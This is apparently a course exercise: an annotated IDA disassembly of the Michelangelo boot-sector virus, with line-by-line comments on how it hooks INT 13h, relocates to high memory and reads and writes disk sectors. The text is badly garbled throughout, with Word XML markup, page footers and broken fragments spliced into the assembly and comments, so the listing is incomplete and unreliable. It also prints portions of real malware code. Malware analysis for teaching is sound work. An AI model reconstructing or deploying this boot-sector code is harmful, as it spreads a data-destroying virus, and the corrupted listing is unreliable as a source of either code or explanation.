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80761718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+-------------------------------------------------------------------------+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| This file has been generated by The Interactive Disassembler (IDA) |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| Copyright (c) 2014 Hex-Rays, &lt;support@hex-rays.com&gt; |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| License info: 48-B071-723;4-BB |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| Golden Richard, University of New Orleans |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+-------------------------------------------------------------------------+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Input MD5 : 3FFC402675E30C6E42560EAA0A90A2B7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Input CRC32 : 827C7725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File Name : /Users/golden/Work/class/4622/examples/MICHELANGELO/m.1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Format : Binary file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Base Address: 0000h Range: 0000h - 0200h Loaded length: 0200h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686p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;enables assembly of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> all instructions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0" w:right="0" w:firstLine="72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(including privileged) on Pentium Pro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.mmx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ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single-instruction, multiple data       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66.944026947021" w:right="0" w:firstLine="33.05597305297851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(SIMD)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.model flat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ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;32 bit memory-model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===========================================================================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Segment type: Regular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 segment byte public '' use16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;tells</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MASM</w:t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 to treat segment as 16-bit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assume cs:seg000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;code segment </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">assigned </w:t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‘seg000’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;org 7C00h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assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing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;sets es, ss, ds, fs, gs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loc_7CAF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color w:val="000080"/>
          <w:sz w:val="19.200000762939453"/>
          <w:szCs w:val="19.200000762939453"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/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;moves to location loc_7CAF, page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unk_7C03 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0F5h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õ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DATA XREF: seg000:7CF0r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  <w:t xml:space="preserve">;places data byte 0F5h at 7C03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;0000 0000 1111 0101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word_7C05 dw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DATA XREF: seg000:7CD8w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;define word value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">‘0’ at 7C05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;define byte value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">‘2’ at 7C07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;define byte value ‘0Eh’ at 7C08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;7C08 = 0000 0000 0000 1110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word_7C0A dw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9739h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DATA XREF: seg000:7CC1w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  <w:t xml:space="preserve">;define word value ‘9739h’ at 7C0A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;7C0A = 0010 0110 0000 1011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word_7C0C dw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0F000h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DATA XREF: seg000:7CC7w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f3f7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  <w:t xml:space="preserve">;define word value ‘0F000h’ at 7C0C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;7C0C = 1111 0000 0000 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;push ds value into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seg000:7C0F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;push ax regi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ster value into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or dl, dl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bitwise OR operation on register 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loc_7C2F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 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ax,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clear ax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;set ds to equal ax (0h)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test byte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43Fh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;tests if bit value at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66.944026947021" w:right="0" w:firstLine="33.055973052978516"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;ds:43Fh (0000 0100 0011 1111) =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0" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;checks drive motor status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0" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;1 indicates a drive motor is running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loc_7C2F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jump to 7C2F if zero-flag is clear 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;ZF, ds:43Fh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;--&gt; if jnz fails, continue through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seg000:7C1F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;pop ax from stack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pop ds from stack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, stack cleared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push EFLAG lower 16-bits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dword ptr cs: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;call cs register 32-bit offset segment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;at 0Ah (0000 0000 0000 1010)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;?value is stored into EFLAG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;push flag ont</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o stack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66.9440269470215" w:right="0" w:firstLine="33.05597305297851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of 8 1/12/16, 2:37 PM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sub_7C36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;call subroutine stored at 7C3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;pop flag from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack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retf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return and pop 2 bytes from stack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;stack pointing at ds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seg000:7C0E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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stack is initialized as ax value -&gt; dx value, dl is OR’d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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?? jnz short loc_7C2F </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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ax is cleared, and 0 value of ax is assigned to ds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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motor spin is tested at memory map loc 0043F, with a jump occurring to loc_7C2F if value returned by 7C18 == 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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:::a drive motor status of 1 indicates a running drive motor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052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if drive motor is not spinning, continue on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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ax and dx are popped from stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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pushf pushes lower 16-bits onto stack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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subroutine 7C36 initialized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056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flag value popped from stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057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stack lower 16-bits are released upon return from function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:widowControl w:val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seg000:7C2C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loc_7C2F:</w:t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seg000:7C12j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seg000:7C2F </w:t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seg000:7C1Dj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seg000:7C2F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;pop ax from stack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;pop ds from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dword ptr cs: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moves to 32-bit 0Ah address in cs reg.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seg000:7C2F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  <w:tab/>
        <w:t xml:space="preserve">ax and ds are popped from stack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  <w:tab/>
        <w:t xml:space="preserve">value 0Ah (0000 0000 0000 1010) stored into code segment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seg000:7C31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 ; =============== S U B R O U T I N E =======================================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sub_7C36 proc near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seg000:7C28p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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;execute subroutine with cs stored in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7C36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bx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cx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;|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  <w:tab/>
        <w:t xml:space="preserve">ax,bx,cx,dx,ds,es,si,di,cs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  <w:tab/>
        <w:t xml:space="preserve">are pushed onto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si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di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cs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seg000:7C3F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ab/>
        <w:t xml:space="preserve">pop ds from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cs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  <w:tab/>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ush cs onto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  <w:tab/>
        <w:t xml:space="preserve">pop es from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  <w:t xml:space="preserve">store value of 4 into si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loc_7C45: </w:t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sub_7C36+29j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;store value of 201h into ax register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;201h  = 0000 0010 0000 0001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bx,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;store value of 200h into b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x register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;200h = 0000 0010 0000 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;store value of 0001 into cx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seg000:7C4E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dx,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;clear dx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;push flag ont</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o stack, decrement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66.944026947021" w:right="0" w:firstLine="33.05597305297851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color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;stack pointer by 2 bytes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dword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;call 32-bit value stored in ds 0Ah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jnb short loc_7C63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if flag is clear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ax,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;clear ax register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;push flag onto stack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dword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;call </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lower 32-bit stored at ds 0Ah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dec si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decrement si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seg000:7C5F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loc_7C45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jump to 7C45 if flag non-zero, else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short loc_7CA6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jump to 7CA6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seg000:7C36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stack is initialized: cs-&gt;di-&gt;si-&gt;es-&gt;ds-&gt;dx-&gt;cx-&gt;bx-&gt;ax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ds is popped from stack, grabbing value of cs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::cs-&gt;di-&gt;si-&gt;es-&gt;dx-&gt;cx-&gt;bx-&gt;ax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after cs is pushed back onto stack, es is popped, grabbing information of cs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stack indicator is reset to 4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ax is assigned value 513, bx is assigned value 512, cx is assigned value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dx is XOR’d, clearing register value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flag is pushed onto stack, decrementing stack pointer by 2 bytes, stack is now pointing to di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data segment 0000 0000 0000 0000 0000 0000 0000 1010 is called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seg000:7C61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seg000:7C63 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loc_7C63: </w:t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sub_7C36+1Fj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si, si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;clear si register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cld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;clear direct</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ion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lodsw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read value at offset 0 (si = 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;read second word of virus in upper </w:t>
        <w:br w:type="textWrapping"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;memory (currently executing copy)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ax, [bx]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;used to set flag for upcoming jnz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loc_7C71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;jnz to loc_7C71 given zero flag set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cmp ax, [bx]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598937988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of 8 1/12/16, 2:37 PM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lodsw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;load 16-bit w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ord into ax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ax, [bx+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used to set flag for upcoming jz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seg000:7C6F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jz short loc_7CA6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given flag set to 1 set by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;cmp ax, [bx+2]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loc_7C71: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sub_7C36+33j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store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301h value into ax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dh,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store 1 value into dh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 xml:space="preserve">;store 3 value into cl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byte ptr [bx+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15h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],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0FDh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'ý'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;compare value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0FDh to value at 8-bit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pointer [bx+15h], used for flag-setting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jz short loc_7C80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if =1 to loc_7C80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seg000:7C7E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store 0Eh value into cl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loc_7C80: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sub_7C36+46j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cx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value of cx register</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into ds:8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;push flag onto stack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dword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 xml:space="preserve">;call value at ds:0Ah 32-bit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jb short loc_7CA6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;jump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-if-below 16-bit value at 7CA6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3BEh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3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BEh value into si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seg000:7C8E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1BEh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1BEh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff8000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into di register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21h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'!'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;store 21h valu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into cx register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cld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;clear direction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rep movsw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;repea</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t move-word 33 (21h) times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according to cx flag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 xml:space="preserve">;store 301h value into ax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bx, bx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;clear bx register</w:t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1 value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">into cx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seg000:7C9F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dx,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;clear dx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;push flag ont</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o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call dword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;call value at ds:0Ah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loc_7CA6: </w:t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sub_7C36+2Bj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seg000:7CA6 </w:t>
        <w:tab/>
        <w:tab/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sub_7C36+39j ...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;|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si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  <w:tab/>
        <w:t xml:space="preserve">pop di,si,es,ds,dx,cx,bx,ax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  <w:tab/>
        <w:t xml:space="preserve">from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cx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;|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bx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;|</w:t>
        <w:tab/>
        <w:t xml:space="preserve">stac</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">k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retn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;return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sub_7C36 endp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ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">end subroutine 7C36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" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="19.200000762939453"/>
          <w:szCs w:val="19.200000762939453"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;jmp loc_7CAF caught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loc_7CAF:</w:t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seg000:7C00j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seg000:7CAF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ax,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;clear </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ax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;assign empty value to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data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cli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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lear interrupt flag (disable sysint)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ss,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;set stack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800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7C00h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;assign 7C00h value into ax regist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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8000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008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;(load address of virus)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8000"/>
          <w:rtl w:val="0"/>
        </w:rPr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sp,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;assign 7C00h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ax)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value into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stack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pointer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left="5006.9440269470215" w:firstLine="33.055973052978516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;boot sector is allocated to stack and operated on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="7166.9440269470215" w:firstLine="33.055973052978516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of 8 1/12/16, 2:37 PM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sti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;se</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t interrupt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;push ds onto stack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;push ax onto stack</w:t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seg000:7CBE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;store ds</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset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4Ch valu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e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ds:word_7C0A,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;store ax </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">register value into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16-bits of 7C0C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;store 4Eh offset value of ds into ax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ds:word_7C0C,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;store ax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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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ax,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413h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 xml:space="preserve">;ds:413h moved into ax (size of MS-DOS)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dec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;decrement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dec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;decreme</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nt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seg000:7CCF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413h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store value of ax register into the </w:t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;413h offset location of ds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;value at ds offset 413h has been - 2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seg000:7CD2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value of 6 into cl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seg000:7CD4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shl ax, cl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;shl divides by 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080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800000"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;DOS uses 8086-style segmentation, where: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800000"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">physical address = segment * 16 + offset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8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seg000:7CD8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ds:word_7C05,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;value of ax move</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">d into ds 16-bit 7C05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;value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0Eh (1110) moved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seg000:7CDE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;4C / 4 = 13, int13 is targeted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;0Eh moved into ds:4Ch (int13)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word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;store value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">es into ds:4Eh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1BEh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;1BEh (0001 1011 1110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff8000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) moved into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7C00h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7C00h (0111 1100 0000 0000) moved into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di, di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;di cleared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cld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;direction flag cle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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seg000:7CEE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rep movsb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;copies m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ichelangelo to high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dword ptr cs:unk_7C03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to high-memory 7CF5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ax,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ab/>
        <w:t xml:space="preserve">;ax cleared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es,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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;value of ax moved into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RESET DISK SYSTEM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;inter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rupt - reset disk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DL = drive (if bit 7 is set both hard disks and floppy disks reset)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cs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;push cs onto stack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11914062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;pop ds </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from stack with value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seg000:7CFD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ab/>
        <w:t xml:space="preserve">;move 201h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bx,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7C00h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;move </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start location into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ds:8 into cx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color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t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;check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s for running drive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loc_7D13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jump non-zero to loc_7D13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80h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'€'</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;move </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80h into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READ SECTORS INTO MEMORY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 xml:space="preserve">;interrupt 13</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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call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232.7587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AL = number of sectors to read, CH = track, CL = sector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232.7587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head, DL = drive, ES:BX -&gt; buffer to fill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seg000:7D0F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CF set on error, AH = status, AL = number of sectors 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short loc_7D3E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;jump to loc_7D3E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seg000:7CF5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ax is cleared, and then that cleared ax value is loaded into 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ds:si = 0h:7C00h</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(data segment: segment index)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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">es:di = 0h:0h</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(extra segment: destination index)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int 13h is called, with ax value 0f this causes a “get status of disk systems” call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this is used to force controller to recalibrate read/write heads, or reset all drives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cs is pushed onto stack, ds is popped off stack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201h is assigned to ax, 7C00h is assigned to bx, value at ds:8 is assigned to cx, and then compared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ab/>
        <w:t xml:space="preserve">7, checking for running drive motor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jump if drive motor is running, otherwise continue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80h is moved into dx, and int 13h is called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because ax = 0010 0000 0001, ah = 02h, causing a sector read function to occur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ab/>
        <w:t xml:space="preserve">AL = 0000 0001, CH = 0000 0001 0000 1110, CL = 0000 1110, DH = 0000 0000 1000 0000,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0" w:right="1076.729736328125" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      |</w:t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DL = 1000 0000, ES:BX = 0h:7C00h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 xml:space="preserve">jump to 7D3E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1076.729736328125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loc_7D13: </w:t>
        <w:tab/>
        <w:tab/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seg000:7D0Aj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ds:8 into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cx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1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff8000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">00h into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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;interrupt 13h call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jb short loc_7D3E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if below loc_7D3E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push cs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;push cs onto stack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seg000:7D1F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pop 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;pop es</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, giving value of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598937988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of 8 1/12/16, 2:37 PM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move value 201h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bx,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200h into bx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1 into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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80h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'€'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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80h into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READ SECTORS INTO MEMORY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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">;interrupt 13h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9488372803" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="2232.7587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AL = number of sectors to read, CH = track, CL = sector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9488372803" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="2232.7587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head, DL = drive, ES:BX -&gt; buffer to fill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7294921875" w:line="216.5797519683838" w:lineRule="auto"/>
